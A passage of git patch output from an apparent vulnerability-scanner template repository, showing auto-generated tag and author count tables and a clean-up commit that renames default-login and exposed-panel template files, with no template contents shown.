xmlchart | 1 | | | | | | | | | +| turbocrm | 1 | | | | | | | | | +| wifisky | 1 | | | | | | | | | +| iceflow | 1 | | | | | | | | | +| announcekit | 1 | | | | | | | | | +| visualtools | 1 | | | | | | | | | +| lancom | 1 | | | | | | | | | +| cockpit | 1 | | | | | | | | | +| heroku | 1 | | | | | | | | | +| faraday | 1 | | | | | | | | | +| node-red-dashboard | 1 | | | | | | | | | +| pippoint | 1 | | | | | | | | | +| tjws | 1 | | | | | | | | | +| empirecms | 1 | | | | | | | | | +| jquery | 1 | | | | | | | | | +| sqlite | 1 | | | | | | | | | +| spidercontrol | 1 | | | | | | | | | +| circontrorl | 1 | | | | | | | | | +| parentlink | 1 | | | | | | | | | +| fortigate | 1 | | | | | | | | | +| kafdrop | 1 | | | | | | | | | +| gsoap | 1 | | | | | | | | | +| hadoop | 1 | | | | | | | | | +| maxsite | 1 | | | | | | | | | +| graylog | 1 | | | | | | | | | +| fortilogger | 1 | | | | | | | | | +| dotclear | 1 | | | | | | | | | +| logontracer | 1 | | | | | | | | | +| payara | 1 | | | | | | | | | | qvisdvr | 1 | | | | | | | | | -| burp | 1 | | | | | | | | | +| wooyun | 1 | | | | | | | | | +| drone | 1 | | | | | | | | | +| artica | 1 | | | | | | | | | +| xvr | 1 | | | | | | | | | +| nweb2fax | 1 | | | | | | | | | +| moin | 1 | | | | | | | | | +| nexusdb | 1 | | | | | | | | | +| sourcebans | 1 | | | | | | | | | +| shoretel | 1 | | | | | | | | | +| emc | 1 | | | | | | | | | +| viewlinc | 1 | | | | | | | | | +| elasticsearch | 1 | | | | | | | | | +| yealink | 1 | | | | | | | | | +| clave | 1 | | | | | | | | | +| postgres | 1 | | | | | | | | | +| pagespeed | 1 | | | | | | | | | +| gilacms | 1 | | | | | | | | | +| diris | 1 | | | | | | | | | +| listserv | 1 | | | | | | | | | +| tidb | 1 | | | | | | | | | +| clockwork | 1 | | | | | | | | | +| netmask | 1 | | | | | | | | | +| wavlink | 1 | | | | | | | | | +| cve2006 | 1 | | | | | | | | | +| phpunit | 1 | | | | | | | | | +| csod | 1 | | | | | | | | | +| plastic | 1 | | | | | | | | | +| solman | 1 | | | | | | | | | +| ambari | 1 | | | | | | | | | +| oscommerce | 1 | | | | | | | | | +| rocketchat | 1 | | | | | | | | | +| couchbase | 1 | | | | | | | | | +| phpwiki | 1 | | | | | | | | | +| zcms | 1 | | | | | | | | | +| tpshop | 1 | | | | | | | | | +| jfrog | 1 | | | | | | | | | +| visionhub | 1 | | | | | | | | | +| achecker | 1 | | | | | | | | | +| wondercms | 1 | | | | | | | | | +| razor | 1 | | | | | | | | | | acme | 1 | | | | | | | | | -| soar | 1 | | | | | | | | | -| jaspersoft | 1 | | | | | | | | | +| jenkin | 1 | | | | | | | | | | redwood | 1 | | | | | | | | | | netgenie | 1 | | | | | | | | | -| sangfor | 1 | | | | | | | | | -| cloudinary | 1 | | | | | | | | | -| elasticsearch | 1 | | | | | | | | | -| sage | 1 | | | | | | | | | -| olivetti | 1 | | | | | | | | | -| gogs | 1 | | | | | | | | | -| gridx | 1 | | | | | | | | | -| gotmls | 1 | | | | | | | | | -| miscrsoft | 1 | | | | | | | | | -| ssltls | 1 | | | | | | | | | -| drone | 1 | | | | | | | | | -| dvwa | 1 | | | | | | | | | -| extractor | 1 | | | | | | | | | -| woocomernce | 1 | | | | | | | | | -| mautic | 1 | | | | | | | | | -| xvr | 1 | | | | | | | | | -| openstack | 1 | | | | | | | | | -| redcap | 1 | | | | | | | | | -| kafdrop | 1 | | | | | | | | | -| fortilogger | 1 | | | | | | | | | -| realteo | 1 | | | | | | | | | -| tamronos | 1 | | | | | | | | | -| shoppable | 1 | | | | | | | | | -| qdpm | 1 | | | | | | | | | -| faraday | 1 | | | | | | | | | -| tapestry | 1 | | | | | | | | | -| blind | 1 | | | | | | | | | -| pgadmin | 1 | | | | | | | | | -| sourcebans | 1 | | | | | | | | | -| erp-nc | 1 | | | | | | | | | -| sgp | 1 | | | | | | | | | -| oidc | 1 | | | | | | | | | -| bedita | 1 | | | | | | | | | -| moinmoin | 1 | | | | | | | | | -| spectracom | 1 | | | | | | | | | -| linksys | 1 | | | | | | | | | -| javafaces | 1 | | | | | | | | | -| bazarr | 1 | | | | | | | | | -| plugin | 1 | | | | | | | | | -| optiLink | 1 | | | | | | | | | -| springframework | 1 | | | | | | | | | -| office365 | 1 | | | | | | | | | -| doh | 1 | | | | | | | | | -| cherokee | 1 | | | | | | | | | -| jquery | 1 | | | | | | | | | -| websvn | 1 | | | | | | | | | -| redis | 1 | | | | | | | | | -| perl | 1 | | | | | | | | | -| wooyun | 1 | | | | | | | | | -| basic-auth | 1 | | | | | | | | | -| redmine | 1 | | | | | | | | | -| sqlite | 1 | | | | | | | | | -| couchbase | 1 | | | | | | | | | -| emc | 1 | | | | | | | | | -| glances | 1 | | | | | | | | | -| fiori | 1 | | | | | | | | | -| argussurveillance | 1 | | | | | | | | | -| htmli | 1 | | | | | | | | | -| commax | 1 | | | | | | | | | -| mdb | 1 | | | | | | | | | +| resourcespace | 1 | | | | | | | | | +| bigbluebutton | 1 | | | | | | | | | | haproxy | 1 | | | | | | | | | -| fuelcms | 1 | | | | | | | | | -| lutron | 1 | | | | | | | | | -| jnoj | 1 | | | | | | | | | -| jenzabar | 1 | | | | | | | | | -| ntopng | 1 | | | | | | | | | -| swagger | 1 | | | | | | | | | -| shopxo | 1 | | | | | | | | | -| craftcms | 1 | | | | | | | | | -| plastic | 1 | | | | | | | | | -| webmin | 1 | | | | | | | | | -| nc2 | 1 | | | | | | | | | -| cobub | 1 | | | | | | | | | -| trilithic | 1 | | | | | | | | | -| esmtp | 1 | | | | | | | | | -| hiawatha | 1 | | | | | | | | | -| trane | 1 | | | | | | | | | -| ricoh | 1 | | | | | | | | | +| htmli | 1 | | | | | | | | | +| monitorr | 1 | | | | | | | | | +| asus | 1 | | | | | | | | | +| javafaces | 1 | | | | | | | | | +| wamp | 1 | | | | | | | | | +| majordomo2 | 1 | | | | | | | | | | nedi | 1 | | | | | | | | | -| saltapi | 1 | | | | | | | | | -| wavemaker | 1 | | | | | | | | | -| sureline | 1 | | | | | | | | | -| dompdf | 1 | | | | | | | | | -| vsftpd | 1 | | | | | | | | | -| cyberoam | 1 | | | | | | | | | -| clave | 1 | | | | | | | | | -| weiphp | 1 | | | | | | | | | -| bitly | 1 | | | | | | | | | -| opencast | 1 | | | | | | | | | -| eg | 1 | | | | | | | | | -| sentry | 1 | | | | | | | | | -| parentlink | 1 | | | | | | | | | -| blackboard | 1 | | | | | | | | | -| plc | 1 | | | | | | | | | -| mantis | 1 | | | | | | | | | -| beanstalk | 1 | | | | | | | | | -| dotclear | 1 | | | | | | | | | -| nomad | 1 | | | | | | | | | -| jitsi | 1 | | | | | | | | | -| graphite | 1 | | | | | | | | | -| solarlog | 1 | | | | | | | | | -| rhymix | 1 | | | | | | | | | -| email | 1 | | | | | | | | | -| ssl | 1 | | | | | | | | | -| fastcgi | 1 | | | | | | | | | -| cerebro | 1 | | | | | | | | | -| maxsite | 1 | | | | | | | | | -| rubedo | 1 | | | | | | | | | -| duomicms | 1 | | | | | | | | | -| socomec | 1 | | | | | | | | | -| spip | 1 | | | | | | | | | -| mongoshake | 1 | | | | | | | | | -| geutebruck | 1 | | | | | | | | | -| pagespeed | 1 | | | | | | | | | -| terraform | 1 | | | | | | | | | -| phpfusion | 1 | | | | | | | | | -| fortigate | 1 | | | | | | | | | -| discord | 1 | | | | | | | | | -| rfi | 1 | | | | | | | | | -| synnefo | 1 | | | | | | | | | -| fortiweb | 1 | | | | | | | | | -| tcexam | 1 | | | | | | | | | -| jenkin | 1 | | | | | | | | | -| karel | 1 | | | | | | | | | -| nexusdb | 1 | | | | | | | | | -| seacms | 1 | | | | | | | | | -| rmc | 1 | | | | | | | | | -| tensorflow | 1 | | | | | | | | | -| announcekit | 1 | | | | | | | | | -| finereport | 1 | | | | | | | | | -| listserv | 1 | | | | | | | | | -| goahead | 1 | | | | | | | | | -| nuuo | 1 | | | | | | | | | -| memcached | 1 | | | | | | | | | -| cgi | 1 | | | | | | | | | -| codeigniter | 1 | | | | | | | | | -| anchorcms | 1 | | | | | | | | | -| pmb | 1 | | | | | | | | | +| centos | 1 | | | | | | | | | +| craftcms | 1 | | | | | | | | | +| octoprint | 1 | | | | | | | | | +| sarg | 1 | | | | | | | | | +| opm | 1 | | | | | | | | | +| tapestry | 1 | | | | | | | | | +| openerp | 1 | | | | | | | | | +| tensorboard | 1 | | | | | | | | | +| aspnuke | 1 | | | | | | | | | +| h3c-imc | 1 | | | | | | | | | +| darkstat | 1 | | | | | | | | | +| cors | 1 | | | | | | | | | +| linkedin | 1 | | | | | | | | | | upnp | 1 | | | | | | | | | -| oneblog | 1 | | | | | | | | | -| expressjs | 1 | | | | | | | | | -| chevereto | 1 | | | | | | | | | -| spring | 1 | | | | | | | | | -| froxlor | 1 | | | | | | | | | -| xmlchart | 1 | | | | | | | | | -| sprintful | 1 | | | | | | | | | +| anchorcms | 1 | | | | | | | | | +| scimono | 1 | | | | | | | | | +| etouch | 1 | | | | | | | | | +| finereport | 1 | | | | | | | | | +| ioncube | 1 | | | | | | | | | +| graphql | 1 | | | | | | | | | +| crm | 1 | | | | | | | | | +| woocomernce | 1 | | | | | | | | | +| tongda | 1 | | | | | | | | | +| netrc | 1 | | | | | | | | | +| metabase | 1 | | | | | | | | | +| lg-nas | 1 | | | | | | | | | +| websvn | 1 | | | | | | | | | +| kerbynet | 1 | | | | | | | | | +| clockwatch | 1 | | | | | | | | | +| dbeaver | 1 | | | | | | | | | +| weiphp | 1 | | | | | | | | | +| xdcms | 1 | | | | | | | | | +| email | 1 | | | | | | | | | +| nifi | 1 | | | | | | | | | +| mantis | 1 | | | | | | | | | +| monitorix | 1 | | | | | | | | | +| huijietong | 1 | | | | | | | | | +| nuxeo | 1 | | | | | | | | | +| discourse | 1 | | | | | | | | | +| enum | 1 | | | | | | | | | +| plugin | 1 | | | | | | | | | +| vsftpd | 1 | | | | | | | | | +| tileserver | 1 | | | | | | | | | +| cloudflare | 1 | | | | | | | | | +| zte | 1 | | | | | | | | | +| api-manager | 1 | | | | | | | | | +| plone | 1 | | | | | | | | | +| omi | 1 | | | | | | | | | +| cherokee | 1 | | | | | | | | | +| tectuus | 1 | | | | | | | | | +| accela | 1 | | | | | | | | | +| hiawatha | 1 | | | | | | | | | +| blackboard | 1 | | | | | | | | | +| webadmin | 1 | | | | | | | | | +| mara | 1 | | | | | | | | | | smartblog | 1 | | | | | | | | | -| mpsec | 1 | | | | | | | | | -| vidyo | 1 | | | | | | | | | -| avtech | 1 | | | | | | | | | +| beanshell | 1 | | | | | | | | | +| landray | 1 | | | | | | | | | +| jaspersoft | 1 | | | | | | | | | +| pacsone | 1 | | | | | | | | | +| bolt | 1 | | | | | | | | | +| burp | 1 | | | | | | | | | +| moinmoin | 1 | | | | | | | | | +| qdpm | 1 | | | | | | | | | +| actuator | 1 | | | | | | | | | +| nomad | 1 | | | | | | | | | +| portainer | 1 | | | | | | | | | +| clusterengine | 1 | | | | | | | | | +| ecoa | 1 | | | | | | | | | +| comodo | 1 | | | | | | | | | +| solarlog | 1 | | | | | | | | | +| postmessage | 1 | | | | | | | | | +| elfinder | 1 | | | | | | | | | +| opentsdb | 1 | | | | | | | | | +| ueditor | 1 | | | | | | | | | +| phpfastcache | 1 | | | | | | | | | +| embedthis | 1 | | | | | | | | | +| magicflow | 1 | | | | | | | | | +| shopxo | 1 | | | | | | | | | +| redcap | 1 | | | | | | | | | +| meraki | 1 | | | | | | | | | +| openstack | 1 | | | | | | | | | +| thinkadmin | 1 | | | | | | | | | +| smi | 1 | | | | | | | | | +| lutron | 1 | | | | | | | | | +| nps | 1 | | | | | | | | | +| setup | 1 | | | | | | | | | +| ssl | 1 | | | | | | | | | +| exacqvision | 1 | | | | | | | | | +| gloo | 1 | | | | | | | | | +| argussurveillance | 1 | | | | | | | | | +| st | 1 | | | | | | | | | +| soar | 1 | | | | | | | | | +| myvuehelp | 1 | | | | | | | | | +| wildfly | 1 | | | | | | | | | +| pgadmin | 1 | | | | | | | | | +| camunda | 1 | | | | | | | | | +| alerta | 1 | | | | | | | | | +| bitly | 1 | | | | | | | | | +| klog | 1 | | | | | | | | | +| ruckus | 1 | | | | | | | | | +| addpac | 1 | | | | | | | | | +| myucms | 1 | | | | | | | | | +| apiman | 1 | | | | | | | | | +| apos | 1 | | | | | | | | | +| biometrics | 1 | | | | | | | | | +| emby | 1 | | | | | | | | | +| blind | 1 | | | | | | | | | +| redis | 1 | | | | | | | | | +| codemeter | 1 | | | | | | | | | +| tracer | 1 | | | | | | | | | +| fortinet | 1 | | | | | | | | | +| adb | 1 | | | | | | | | | +| timeclock | 1 | | | | | | | | | +| tamronos | 1 | | | | | | | | | +| karel | 1 | | | | | | | | | +| salesforce | 1 | | | | | | | | | +| cgi | 1 | | | | | | | | | +| gogs | 1 | | | | | | | | | +| eyou | 1 | | | | | | | | | +| landrayoa | 1 | | | | | | | | | +| simplecrm | 1 | | | | | | | | | +| sco | 1 | | | | | | | | | +| azkaban | 1 | | | | | | | | | +| panabit | 1 | | | | | | | | | +| b2evolution | 1 | | | | | | | | | +| labtech | 1 | | | | | | | | | +| synnefo | 1 | | | | | | | | | +| tor | 1 | | | | | | | | | +| skywalking | 1 | | | | | | | | | +| gridx | 1 | | | | | | | | | +| tenda | 1 | | | | | | | | | +| redmine | 1 | | | | | | | | | +| trane | 1 | | | | | | | | | +| subrion | 1 | | | | | | | | | +| 74cms | 1 | | | | | | | | | +| processmaker | 1 | | | | | | | | | +| javascript | 1 | | | | | | | | | +| centreon | 1 | | | | | | | | | +| frontpage | 1 | | | | | | | | | +| fiori | 1 | | | | | | | | | +| robomongo | 1 | | | | | | | | | +| concrete | 1 | | | | | | | | | +| opencast | 1 | | | | | | | | | +| zookeeper | 1 | | | | | | | | | +| chyrp | 1 | | | | | | | | | +| sangfor | 1 | | | | | | | | | +| cofax | 1 | | | | | | | | | +| twitter-server | 1 | | | | | | | | | +| grails | 1 | | | | | | | | | +| vnc | 1 | | | | | | | | | +| memcached | 1 | | | | | | | | | +| dotnet | 1 | | | | | | | | | +| cerebro | 1 | | | | | | | | | +| expn | 1 | | | | | | | | | +| fortiweb | 1 | | | | | | | | | +| jitsi | 1 | | | | | | | | | +| yachtcontrol | 1 | | | | | | | | | +| bullwark | 1 | | | | | | | | | +| dotnetnuke | 1 | | | | | | | | | +| gotmls | 1 | | | | | | | | | +| erp-nc | 1 | | | | | | | | | +| pcoip | 1 | | | | | | | | | +| clickhouse | 1 | | | | | | | | | +| zeroshell | 1 | | | | | | | | | +| upload | 1 | | | | | | | | | +| wiki | 1 | | | | | | | | | +| openemr | 1 | | | | | | | | | +| spf | 1 | | | | | | | | | +| tcexam | 1 | | | | | | | | | +| iptime | 1 | | | | | | | | | +| lansweeper | 1 | | | | | | | | | +| eyelock | 1 | | | | | | | | | +| doh | 1 | | | | | | | | | +| xampp | 1 | | | | | | | | | +| basic-auth | 1 | | | | | | | | | +| minimouse | 1 | | | | | | | | | +| ilo4 | 1 | | | | | | | | | +| optiLink | 1 | | | | | | | | | +| chinaunicom | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index f02a577fe5..14d3b72a5f 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,6 +1,6 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 719 | pikpikcu | 273 | cves | 724 | info | 642 | http | 1962 | +| cve | 724 | pikpikcu | 273 | cves | 724 | info | 642 | http | 1962 | | lfi | 258 | dhiyaneshdk | 258 | vulnerabilities | 299 | high | 552 | file | 46 | | panel | 248 | daffainfo | 213 | exposed-panels | 248 | medium | 449 | network | 41 | | xss | 244 | pdteam | 196 | technologies | 190 | critical | 271 | dns | 12 | @@ -8,5 +8,5 @@ | wordpress | 222 | dwisiswant0 | 131 | misconfiguration | 136 | | | | | | rce | 198 | gy741 | 72 | takeovers | 64 | | | | | | tech | 181 | pussycat0x | 65 | default-logins | 56 | | | | | -| cve2020 | 164 | princechaddha | 61 | file | 46 | | | | | -| wp-plugin | 149 | madrobot | 61 | workflows | 36 | | | | | +| cve2020 | 164 | madrobot | 61 | file | 46 | | | | | +| wp-plugin | 149 | princechaddha | 61 | workflows | 36 | | | | | From 88c213d5210c84f37e2c69f48a25689d10f1ef49 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 21 Sep 2021 10:56:36 +0000 Subject: [PATCH 2464/4083] Auto Update README [Tue Sep 21 10:56:35 UTC 2021] :robot: --- README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index a6bb846598..d27919e54a 100644 --- a/README.md +++ b/README.md @@ -42,7 +42,7 @@ An overview of the nuclei template project, including statistics on unique tags, | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 719 | pikpikcu | 273 | cves | 724 | info | 642 | http | 1962 | +| cve | 724 | pikpikcu | 273 | cves | 724 | info | 642 | http | 1962 | | lfi | 258 | dhiyaneshdk | 258 | vulnerabilities | 299 | high | 552 | file | 46 | | panel | 248 | daffainfo | 213 | exposed-panels | 248 | medium | 449 | network | 41 | | xss | 244 | pdteam | 196 | technologies | 190 | critical | 271 | dns | 12 | @@ -50,8 +50,8 @@ An overview of the nuclei template project, including statistics on unique tags, | wordpress | 222 | dwisiswant0 | 131 | misconfiguration | 136 | | | | | | rce | 198 | gy741 | 72 | takeovers | 64 | | | | | | tech | 181 | pussycat0x | 65 | default-logins | 56 | | | | | -| cve2020 | 164 | princechaddha | 61 | file | 46 | | | | | -| wp-plugin | 149 | madrobot | 61 | workflows | 36 | | | | | +| cve2020 | 164 | madrobot | 61 | file | 46 | | | | | +| wp-plugin | 149 | princechaddha | 61 | workflows | 36 | | | | | **164 directories, 2122 files**. From 807920c0ac2993eb2b3a3cc5a4585ea8abff277d Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 21 Sep 2021 17:16:53 +0530 Subject: [PATCH 2465/4083] clean-up --- cves/2014/CVE-2014-9094.yaml | 2 +- cves/2016/CVE-2016-6277.yaml | 2 +- cves/2019/CVE-2019-7543.yaml | 2 +- cves/2020/CVE-2020-28351.yaml | 2 +- cves/2021/CVE-2021-35265.yaml | 2 +- ...credentials.yaml => ucmdb-default-login.yaml} | 2 +- ...t-credentials.yaml => aem-default-login.yaml} | 2 +- ...lt-password.yaml => canal-default-login.yaml} | 4 ++-- ...redentials.yaml => ambari-default-login.yaml} | 0 ...edentials.yaml => airflow-default-login.yaml} | 0 ...dentials.yaml => superset-default-login.yaml} | 0 ...er-default.yaml => tomcat-default-login.yaml} | 4 ++-- ...ault-password.yaml => arl-default-login.yaml} | 4 ++-- ...lt-password.yaml => axis2-default-login.yaml} | 0 ...ult-creds.yaml => azkaban-default-login.yaml} | 2 +- ...tials.yaml => chinaunicom-default-login.yaml} | 2 +- ...edentials.yaml => emcecom-default-login.yaml} | 0 ...lt-password.yaml => druid-default-login.yaml} | 4 ++-- default-logins/dvwa/dvwa-default-login.yaml | 2 +- ...tials.yaml => exacqvision-default-login.yaml} | 4 ++-- ...-credentials.yaml => flir-default-login.yaml} | 2 +- ...t-credentials.yaml => frp-default-login.yaml} | 0 ...t-credential.yaml => glpi-default-login.yaml} | 4 ++-- ...redential.yaml => grafana-default-login.yaml} | 4 ++-- ...password.yaml => hongdian-default-login.yaml} | 0 ...ntials.yaml => smartsense-default-login.yaml} | 2 +- .../ibm/ibm-storage-default-credential.yaml | 4 ++-- ...yaml => idemia-biometrics-default-login.yaml} | 2 +- default-logins/iptime/iptime-default-login.yaml | 2 +- ...lt-password.yaml => minio-default-login.yaml} | 4 ++-- ...credential.yaml => nagios-default-login.yaml} | 4 ++-- ...lt-password.yaml => nexus-default-login.yaml} | 4 ++-- ...ault-password.yaml => nps-default-login.yaml} | 4 ++-- ...credentials.yaml => ofbiz-default-login.yaml} | 0 ...l => businessintelligence-default-login.yaml} | 2 +- ...credentials.yaml => panos-default-login.yaml} | 2 +- ...-password.yaml => panabit-default-login.yaml} | 4 ++-- ...lt-admin.yaml => rabbitmq-default-login.yaml} | 4 ++-- ...entials.yaml => rockmongo-default-login.yaml} | 2 +- ...ials.yaml => samsung-wlan-default-login.yaml} | 2 +- ...-password.yaml => showdoc-default-login.yaml} | 4 ++-- ...-admin.yaml => solarwinds-default-login.yaml} | 0 ...ential.yaml => spectracom-default-login.yaml} | 4 ++-- ...ult-password.yaml => szhe-default-login.yaml} | 4 ++-- ...credentials.yaml => vidyo-default-login.yaml} | 0 ...fault.yaml => trilithic-viewpoint-login.yaml} | 0 ...entials.yaml => visionhub-default-login.yaml} | 0 ...-password.yaml => wifisky-default-login.yaml} | 4 ++-- ...ult-password.yaml => wso2-default-login.yaml} | 4 ++-- default-logins/xxljob/xxljob-default-login.yaml | 2 +- ...redentials.yaml => zabbix-default-login.yaml} | 0 ...credential.yaml => zmanda-default-login.yaml} | 2 +- .../{ => adobe}/adobe-component-login.yaml | 0 .../{ => adobe}/adobe-connect-central-login.yaml | 0 .../adobe-experience-manager-login.yaml | 0 .../{ => adobe}/adobe-media-server.yaml | 0 ...ent-suite-login.yaml => dell-wyse-login.yaml} | 2 +- ...e-entrust.yaml => entrust-identityguard.yaml} | 0 ...cess-detect.yaml => epson-access-detect.yaml} | 4 ++-- .../exposed-pagespeed-global-admin.yaml | 16 ---------------- ...as-detect.yaml => iomega-emc-shared-nas.yaml} | 2 +- .../manage-engine-admanager-panel.yaml | 16 ---------------- ...-panel.yaml => microsoft-exchange-panel.yaml} | 2 +- ...teur.yaml => pacs-connexion-utilisateur.yaml} | 0 ...ng-control.yaml => scs-landfill-control.yaml} | 2 +- ...zation.yaml => tomcat-pathnormalization.yaml} | 0 ...rd-detect.yaml => weave-scope-dashboard.yaml} | 2 +- ...tect.yaml => workspaceone-uem-dashboard.yaml} | 2 +- .../manageengine-adaudit.yaml} | 9 +++++---- .../manageengine-adselfservice.yaml} | 6 +++--- .../manageengine-analytics.yaml} | 6 +++--- .../manageengine-apex-helpdesk.yaml} | 6 +++--- .../manageengine-applications-manager.yaml} | 6 +++--- .../manageengine-assetexplorer.yaml} | 6 +++--- .../manageengine-desktop.yaml} | 6 +++--- .../manageengine-opmanager.yaml} | 6 +++--- .../manageengine-servicedesk.yaml} | 6 +++--- .../manageengine-supportcenter.yaml} | 6 +++--- ...disclosure.yaml => amazon-docker-config.yaml} | 2 +- ...losure.yaml => kyan-credential-exposure.yaml} | 2 +- ...sclosure.yaml => oracle-ebs-credentials.yaml} | 2 +- ...d-leak.yaml => ruijie-nbr1300g-exposure.yaml} | 2 +- ...e.yaml => rails-secret-token-disclosure.yaml} | 2 +- ...sure.yaml => sensitive-storage-exposure.yaml} | 0 fuzzing/xff-403-bypass.yaml | 2 +- ...ect.yaml => brother-unauthorized-access.yaml} | 4 ++-- iot/panasonic-network-management.yaml | 2 +- ...a-leak.yaml => etcd-unauthenticated-api.yaml} | 0 .../gitlab/gitlab-user-enumeration.yaml | 3 +-- ...ve-info.yaml => zenphoto-sensitive-info.yaml} | 0 ...ory-traversal.yaml => ibm-infoprint-lfi.yaml} | 0 91 files changed, 108 insertions(+), 140 deletions(-) rename default-logins/UCMDB/{micro-focus-ucmdb-default-credentials.yaml => ucmdb-default-login.yaml} (92%) rename default-logins/aem/{adobe-aem-default-credentials.yaml => aem-default-login.yaml} (97%) rename default-logins/alibaba/{alibaba-canal-default-password.yaml => canal-default-login.yaml} (86%) rename default-logins/ambari/{ambari-default-credentials.yaml => ambari-default-login.yaml} (100%) rename default-logins/apache/{airflow-default-credentials.yaml => airflow-default-login.yaml} (100%) rename default-logins/apache/{apache-superset-default-credentials.yaml => superset-default-login.yaml} (100%) rename default-logins/apache/{tomcat-manager-default.yaml => tomcat-default-login.yaml} (91%) rename default-logins/arl/{arl-default-password.yaml => arl-default-login.yaml} (90%) rename default-logins/axis2/{axis2-default-password.yaml => axis2-default-login.yaml} (100%) rename default-logins/azkaban/{azkaban-web-client-default-creds.yaml => azkaban-default-login.yaml} (91%) rename default-logins/chinaunicom/{chinaunicom-modem-default-credentials.yaml => chinaunicom-default-login.yaml} (91%) rename default-logins/dell/{dell-emc-ecom-default-credentials.yaml => emcecom-default-login.yaml} (100%) rename default-logins/druid/{druid-default-password.yaml => druid-default-login.yaml} (82%) rename default-logins/exacqvision/{exacqvision-default-credentials.yaml => exacqvision-default-login.yaml} (91%) rename default-logins/flir/{flir-ax8-default-credentials.yaml => flir-default-login.yaml} (96%) rename default-logins/frps/{frp-default-credentials.yaml => frp-default-login.yaml} (100%) rename default-logins/glpi/{glpi-default-credential.yaml => glpi-default-login.yaml} (95%) rename default-logins/grafana/{grafana-default-credential.yaml => grafana-default-login.yaml} (94%) rename default-logins/hongdian/{hongdian-default-password.yaml => hongdian-default-login.yaml} (100%) rename default-logins/hortonworks/{hortonworks-smartsense-default-credentials.yaml => smartsense-default-login.yaml} (92%) rename default-logins/idemia/{idemia-biometrics-default-credentials.yaml => idemia-biometrics-default-login.yaml} (92%) rename default-logins/minio/{minio-default-password.yaml => minio-default-login.yaml} (93%) rename default-logins/nagios/{nagios-default-credential.yaml => nagios-default-login.yaml} (86%) rename default-logins/nexus/{nexus-default-password.yaml => nexus-default-login.yaml} (90%) rename default-logins/nps/{nps-default-password.yaml => nps-default-login.yaml} (92%) rename default-logins/ofbiz/{ofbiz-default-credentials.yaml => ofbiz-default-login.yaml} (100%) rename default-logins/oracle/{oracle-bi-default-credentials.yaml => businessintelligence-default-login.yaml} (95%) rename default-logins/paloalto/{panos-default-credentials.yaml => panos-default-login.yaml} (95%) rename default-logins/panabit/{panabit-default-password.yaml => panabit-default-login.yaml} (93%) rename default-logins/rabbitmq/{rabbitmq-default-admin.yaml => rabbitmq-default-login.yaml} (87%) rename default-logins/rockmongo/{rockmongo-default-credentials.yaml => rockmongo-default-login.yaml} (95%) rename default-logins/samsung/{samsung-wlan-ap-default-credentials.yaml => samsung-wlan-default-login.yaml} (93%) rename default-logins/showdoc/{showdoc-default-password.yaml => showdoc-default-login.yaml} (90%) rename default-logins/solarwinds/{solarwinds-default-admin.yaml => solarwinds-default-login.yaml} (100%) rename default-logins/spectracom/{spectracom-default-credential.yaml => spectracom-default-login.yaml} (89%) rename default-logins/szhe/{szhe-default-password.yaml => szhe-default-login.yaml} (92%) rename default-logins/vidyo/{vidyo-default-credentials.yaml => vidyo-default-login.yaml} (100%) rename default-logins/viewpoint/{trilithic-viewpoint-default.yaml => trilithic-viewpoint-login.yaml} (100%) rename default-logins/visionhub/{visionhub-default-credentials.yaml => visionhub-default-login.yaml} (100%) rename default-logins/wifisky/{wifisky-default-password.yaml => wifisky-default-login.yaml} (89%) rename default-logins/wso2/{wso2-default-password.yaml => wso2-default-login.yaml} (85%) rename default-logins/zabbix/{zabbix-default-credentials.yaml => zabbix-default-login.yaml} (100%) rename default-logins/zmanda/{zmanda-default-credential.yaml => zmanda-default-login.yaml} (95%) rename exposed-panels/{ => adobe}/adobe-component-login.yaml (100%) rename exposed-panels/{ => adobe}/adobe-connect-central-login.yaml (100%) rename exposed-panels/{ => adobe}/adobe-experience-manager-login.yaml (100%) rename exposed-panels/{ => adobe}/adobe-media-server.yaml (100%) rename exposed-panels/{dell-wyse-management-suite-login.yaml => dell-wyse-login.yaml} (93%) rename exposed-panels/{identityguard-selfservice-entrust.yaml => entrust-identityguard.yaml} (100%) rename exposed-panels/{epson-unauthorized-access-detect.yaml => epson-access-detect.yaml} (84%) delete mode 100644 exposed-panels/exposed-pagespeed-global-admin.yaml rename exposed-panels/{iomega-lenovo-emc-shared-nas-detect.yaml => iomega-emc-shared-nas.yaml} (93%) delete mode 100644 exposed-panels/manage-engine-admanager-panel.yaml rename exposed-panels/{microsoft-exchange-control-panel.yaml => microsoft-exchange-panel.yaml} (88%) rename exposed-panels/{gxd5-pacs-connexion-utilisateur.yaml => pacs-connexion-utilisateur.yaml} (100%) rename exposed-panels/{landfill-remote-monitoring-control.yaml => scs-landfill-control.yaml} (94%) rename exposed-panels/{tomcat-manager-pathnormalization.yaml => tomcat-pathnormalization.yaml} (100%) rename exposed-panels/{weave-scope-dashboard-detect.yaml => weave-scope-dashboard.yaml} (91%) rename exposed-panels/{workspaceone-uem-airwatch-dashboard-detect.yaml => workspaceone-uem-dashboard.yaml} (88%) rename exposed-panels/{zoho-manageengine-adaudit.yaml => zoho/manageengine-adaudit.yaml} (64%) rename exposed-panels/{zoho-manageengine-adselfservice-plus.yaml => zoho/manageengine-adselfservice.yaml} (78%) rename exposed-panels/{zoho-manageengine-analyticsplus.yaml => zoho/manageengine-analytics.yaml} (76%) rename exposed-panels/{zoho-manageengine-apex-helpdesk.yaml => zoho/manageengine-apex-helpdesk.yaml} (75%) rename exposed-panels/{zoho-manageengine-applications-manager.yaml => zoho/manageengine-applications-manager.yaml} (78%) rename exposed-panels/{zoho-manageengine-assetexplorer.yaml => zoho/manageengine-assetexplorer.yaml} (75%) rename exposed-panels/{zoho-manageengine-desktop.yaml => zoho/manageengine-desktop.yaml} (78%) rename exposed-panels/{zoho-manageengine-opmanager.yaml => zoho/manageengine-opmanager.yaml} (78%) rename exposed-panels/{zoho-manageengine-servicedesk.yaml => zoho/manageengine-servicedesk.yaml} (79%) rename exposed-panels/{zoho-manageengine-supportcenter.yaml => zoho/manageengine-supportcenter.yaml} 